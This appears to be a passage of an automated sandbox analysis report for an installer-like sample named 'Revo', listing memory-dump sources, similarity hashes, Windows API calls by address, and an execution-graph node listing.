                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                            • String ID: F
                                                                                                                                                                            • API String ID: 941294808-1304234792
                                                                                                                                                                            • Opcode ID: fed5d4dc3d325cae90a53ae0d2fcb83d70f3ae94d69320437858ee33f07fdf71
                                                                                                                                                                            • Instruction ID: dda4e0b8355a10cf3a4659add9ec42a83d374e9472f600803517c33aed587cab
                                                                                                                                                                            • Opcode Fuzzy Hash: fed5d4dc3d325cae90a53ae0d2fcb83d70f3ae94d69320437858ee33f07fdf71
                                                                                                                                                                            • Instruction Fuzzy Hash: 96418A71804209AFCF058FA5DE459BFBBB9FF45314F00802EF991AA1A0C7749A55DFA4
                                                                                                                                                                            APIs
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406483,?,?), ref: 00406323
                                                                                                                                                                            • GetShortPathNameW.KERNEL32(?,0045ADE8,00000400), ref: 0040632C
                                                                                                                                                                              • Part of subcall function 004060F7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406107
                                                                                                                                                                              • Part of subcall function 004060F7: lstrlenA.KERNEL32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406139
                                                                                                                                                                            • GetShortPathNameW.KERNEL32(?,0045B5E8,00000400), ref: 00406349
                                                                                                                                                                            • wsprintfA.USER32 ref: 00406367
                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,0045B5E8,C0000000,00000004,0045B5E8,?,?,?,?,?), ref: 004063A2
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004063B1
                                                                                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063E9
                                                                                                                                                                            • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,0045A9E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040643F
                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00406450
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406457
                                                                                                                                                                              • Part of subcall function 00406192: GetFileAttributesW.KERNEL32(00000003,00403138,004D9000,80000000,00000003), ref: 00406196
                                                                                                                                                                              • Part of subcall function 00406192: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                            • String ID: %ls=%ls$[Rename]
                                                                                                                                                                            • API String ID: 2171350718-461813615
                                                                                                                                                                            • Opcode ID: 4099efde17faabea8ca23ed937e5d9f442c3975f0fb2967c08604eca1be790f2
                                                                                                                                                                            • Instruction ID: 026d517b253a5d6ccbe57f845948a58d3e37c3b70aabf831ebb2f23b3e620644
                                                                                                                                                                            • Opcode Fuzzy Hash: 4099efde17faabea8ca23ed937e5d9f442c3975f0fb2967c08604eca1be790f2
                                                                                                                                                                            • Instruction Fuzzy Hash: 14312370600315BBD2207F659D49F6B3A6CDF41759F12403AFA02F62D3EA7C982986BD
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 004046A5
                                                                                                                                                                            • GetSysColor.USER32(00000000), ref: 004046E3
                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 004046EF
                                                                                                                                                                            • SetBkMode.GDI32(?,?), ref: 004046FB
                                                                                                                                                                            • GetSysColor.USER32(?), ref: 0040470E
                                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 0040471E
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00404738
                                                                                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00404742
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2320649405-0
                                                                                                                                                                            • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                                                            • Instruction ID: dc9e33635e48260261a40037ac820fc698cd45b4c1bae75aa0874807b7806060
                                                                                                                                                                            • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                                                            • Instruction Fuzzy Hash: B321A7715007049BCB309F38DA48B5B7BF4AF82714B00893DE9A6B72E0D778E904CB58
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FF7
                                                                                                                                                                            • GetMessagePos.USER32 ref: 00404FFF
                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00405019
                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040502B
                                                                                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405051
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                                                                                            • String ID: f
                                                                                                                                                                            • API String ID: 41195575-1993550816
                                                                                                                                                                            • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                                                            • Instruction ID: 35c53ee3dfde216a4a17f9e8076a2c946c4c65f0c866826bb74e9a6ab3448864
                                                                                                                                                                            • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                                                            • Instruction Fuzzy Hash: F3015E31900218BADB00DBA4DD85BFFBBBCEF55711F10412BBA51B61D0D7B49A058BA4
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDC.USER32(?), ref: 00401E76
                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                                                                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                                                                                                                                                            • CreateFontIndirectW.GDI32(0041E5F8), ref: 00401EF8
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                            • String ID: Tahoma
                                                                                                                                                                            • API String ID: 3808545654-3580928618
                                                                                                                                                                            • Opcode ID: e7f7f24e504178032ddcf332a7fccd4deaa03fd5eea84bddf963d4e06575246e
                                                                                                                                                                            • Instruction ID: 75d1d1a794b0a88cdf1cba10915d0c929158808af8533b27f0e618500a238d04
                                                                                                                                                                            • Opcode Fuzzy Hash: e7f7f24e504178032ddcf332a7fccd4deaa03fd5eea84bddf963d4e06575246e
                                                                                                                                                                            • Instruction Fuzzy Hash: 5C01D475900260FFEB005BB5AD0DBDD7FB0AB29300F50C83AF542B61E2CAB904448B2D
                                                                                                                                                                            APIs
                                                                                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,004BD000,74DF3420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069B3
                                                                                                                                                                            • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069C2
                                                                                                                                                                            • CharNextW.USER32(?,004BD000,74DF3420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069C7
                                                                                                                                                                            • CharPrevW.USER32(?,?,74DF3420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069DA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Char$Next$Prev
                                                                                                                                                                            • String ID: *?|<>/":
                                                                                                                                                                            • API String ID: 589700163-165019052
                                                                                                                                                                            • Opcode ID: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                                                                                                                                            • Instruction ID: ee050b90af12f7da754e5e1a7cefda923f304df8a209a79dab08f9ec4fc7f4f9
                                                                                                                                                                            • Opcode Fuzzy Hash: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                                                                                                                                            • Instruction Fuzzy Hash: 0311B695800612A5DB303B148D40AB7A2F8AF55794F52403FED9AB3AC1EB7C4C9286BD
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                                                                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseEnum$DeleteValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1354259210-0
                                                                                                                                                                            • Opcode ID: acaf4fc398a66893391ff6439948fdf9f5bbe1b70c5a8b97b274ab2e0b988985
                                                                                                                                                                            • Instruction ID: 5e325e4eb8c599eaadb2b1545cb8ec7488c9788084a271734582f96bfbf33a22
                                                                                                                                                                            • Opcode Fuzzy Hash: acaf4fc398a66893391ff6439948fdf9f5bbe1b70c5a8b97b274ab2e0b988985
                                                                                                                                                                            • Instruction Fuzzy Hash: FA213D7150010ABFEF129F90CE89EEF7B7DEB54388F110076B909B11E0D7759E54AA64
                                                                                                                                                                            APIs
                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 004056CA
                                                                                                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 0040571B
                                                                                                                                                                              • Part of subcall function 0040466D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040467F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                                                                                            • Opcode ID: 40cceb3117afc414cce41506be3bec60ebea1126e7aded61cc02dde06f92d8ba
                                                                                                                                                                            • Instruction ID: 4a72d77d5ba7db911775b8fd6e8698557fa8fe3088d7b3c11d294ca78c68b4d0
                                                                                                                                                                            • Opcode Fuzzy Hash: 40cceb3117afc414cce41506be3bec60ebea1126e7aded61cc02dde06f92d8ba
                                                                                                                                                                            • Instruction Fuzzy Hash: 6801B131100708EFDB204F90DDC0A9B3665FB80750F504036F605761D1D77A8C91EE2D
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406107
                                                                                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040611F
                                                                                                                                                                            • CharNextA.USER32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406130
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406139
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 190613189-0
                                                                                                                                                                            • Opcode ID: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                                                                                                                                            • Instruction ID: 5f3436636367d0d5bc92f6b0e419d408aad35ecbe6557c54d873c5627a92c34c
                                                                                                                                                                            • Opcode Fuzzy Hash: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                                                                                                                                            • Instruction Fuzzy Hash: E4F0BB35604414FFC702DFA5DD00D9EBBA8EF46350B2640B9F841FB211D674DE129B99

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:10.4%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                            Signature Coverage:3.3%
                                                                                                                                                                            Total number of Nodes:1498
                                                                                                                                                                            Total number of Limit Nodes:32
                                                                                                                                                                            execution_graph 24711 ff90fa 21 API calls 2 library calls 22872 febaf9 22874 feb51b _wcsrchr 22872->22874 22875 febafe 22872->22875 22876 fec0c4 22874->22876 22879 feb808 SetWindowTextW 22874->22879 22896 feb5ec ___scrt_fastfail 22874->22896 22921 fe1410 CompareStringW 22874->22921 22922 fe95f8 GetCurrentDirectoryW 22874->22922 22923 fda215 7 API calls 22874->22923 22929 fda19e FindClose 22874->22929 22930 fea2ae 76 API calls ___std_exception_copy 22874->22930 22931 ff2b5e 22874->22931 22944 fea156 ExpandEnvironmentStringsW 22874->22944 22875->22874 22898 fec431 22875->22898 22879->22874 22884 feb5f9 SetFileAttributesW 22886 feb6b4 GetFileAttributesW 22884->22886 22884->22896 22888 feb6c2 DeleteFileW 22886->22888 22886->22896 22888->22896 22890 feb9d2 GetDlgItem SetWindowTextW SendMessageW 22890->22896 22892 feba14 SendMessageW 22892->22874 22894 feb708 MoveFileW 22895 feb720 MoveFileExW 22894->22895 22894->22896 22895->22896 22896->22874 22896->22884 22896->22890 22896->22892 22897 feb690 SHFileOperationW 22896->22897 22924 fdb1b7 52 API calls 2 library calls 22896->22924 22925 fd3e41 22896->22925 22928 fda215 7 API calls 22896->22928 22897->22886 22900 fec43b ___scrt_fastfail 22898->22900 22899 fec693 22899->22874 22900->22899 22901 fec526 22900->22901 22952 fe1410 CompareStringW 22900->22952 22945 fd9e6b 22901->22945 22905 fec55a ShellExecuteExW 22905->22899 22906 fec56d 22905->22906 22909 fec5a8 WaitForInputIdle 22906->22909 22910 fec597 IsWindowVisible 22906->22910 22911 fec5fe CloseHandle 22906->22911 22908 fec552 22908->22905 22948 fec8f0 WaitForSingleObject 22909->22948 22910->22909 22912 fec5a2 ShowWindow 22910->22912 22915 fec60c 22911->22915 22916 fec617 22911->22916 22912->22909 22954 fe1410 CompareStringW 22915->22954 22916->22899 22919 fec68e ShowWindow 22916->22919 22918 fec5d3 GetExitCodeProcess 22918->22911 22920 fec5e6 22918->22920 22919->22899 22920->22911 22921->22874 22922->22874 22923->22874 22924->22896 22978 fd3e14 22925->22978 22928->22896 22929->22874 22930->22874 22932 ff7b78 22931->22932 22933 ff7b85 22932->22933 22934 ff7b90 22932->22934 23050 ff7a8a 22933->23050 22936 ff7b98 22934->22936 22942 ff7ba1 _unexpected 22934->22942 22937 ff7a50 _free 20 API calls 22936->22937 22940 ff7b8d 22937->22940 22938 ff7bcb HeapReAlloc 22938->22940 22938->22942 22939 ff7ba6 23057 ff7ecc 20 API calls _abort 22939->23057 22940->22874 22942->22938 22942->22939 23058 ff6763 7 API calls 2 library calls 22942->23058 22944->22874 22955 fd9e7f 22945->22955 22949 fec926 22948->22949 22950 fec5c0 22949->22950 22951 fec909 PeekMessageW WaitForSingleObject 22949->22951 22950->22911 22950->22918 22951->22949 22952->22901 22953 fdaed7 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 22953->22908 22954->22916 22963 fed940 22955->22963 22958 fd9e9d 22965 fdb32c 22958->22965 22959 fd9e74 22959->22905 22959->22953 22961 fd9eb1 22961->22959 22962 fd9eb5 GetFileAttributesW 22961->22962 22962->22959 22964 fd9e8c GetFileAttributesW 22963->22964 22964->22958 22964->22959 22966 fdb339 22965->22966 22974 fdb343 22966->22974 22975 fdb4c6 CharUpperW 22966->22975 22968 fdb352 22976 fdb4f2 CharUpperW 22968->22976 22970 fdb361 22971 fdb3dc GetCurrentDirectoryW 22970->22971 22972 fdb365 22970->22972 22971->22974 22977 fdb4c6 CharUpperW 22972->22977 22974->22961 22975->22968 22976->22970 22977->22974 22979 fd3e2b __vswprintf_c_l 22978->22979 22982 ff4cf4 22979->22982 22985 ff2db7 22982->22985 22986 ff2ddf 22985->22986 22987 ff2df7 22985->22987 23002 ff7ecc 20 API calls _abort 22986->23002 22987->22986 22988 ff2dff 22987->22988 23004 ff3356 22988->23004 22991 ff2de4 23003 ff7dab 26 API calls __cftof 22991->23003 22995 fee203 ___delayLoadHelper2@8 5 API calls 22997 fd3e35 GetFileAttributesW 22995->22997 22996 ff2e87 23013 ff3706 51 API calls 3 library calls 22996->23013 22997->22894 22997->22896 23000 ff2e92 23014 ff33d9 20 API calls _free 23000->23014 23001 ff2def 23001->22995 23002->22991 23003->23001 23005 ff2e0f 23004->23005 23006 ff3373 23004->23006 23012 ff3321 20 API calls 2 library calls 23005->23012 23006->23005 23015 ff8516 GetLastError 23006->23015 23008 ff3394 23036 ff8665 38 API calls __cftof 23008->23036 23010 ff33ad 23037 ff8692 38 API calls __cftof 23010->23037 23012->22996 23013->23000 23014->23001 23016 ff852c 23015->23016 23017 ff8538 23015->23017 23038 ff9b53 11 API calls 2 library calls 23016->23038 23039 ff7b1b 20 API calls 3 library calls 23017->23039 23020 ff8532 23020->23017 23022 ff8581 SetLastError 23020->23022 23021 ff8544 23028 ff854c 23021->23028 23046 ff9ba9 11 API calls 2 library calls 23021->23046 23022->23008 23025 ff8561 23027 ff8568 23025->23027 23025->23028 23026 ff8552 23029 ff858d SetLastError 23026->23029 23047 ff8388 20 API calls _unexpected 23027->23047 23040 ff7a50 23028->23040 23048 ff7ad8 38 API calls _abort 23029->23048 23031 ff8573 23033 ff7a50 _free 20 API calls 23031->23033 23035 ff857a 23033->23035 23035->23022 23035->23029 23036->23010 23037->23005 23038->23020 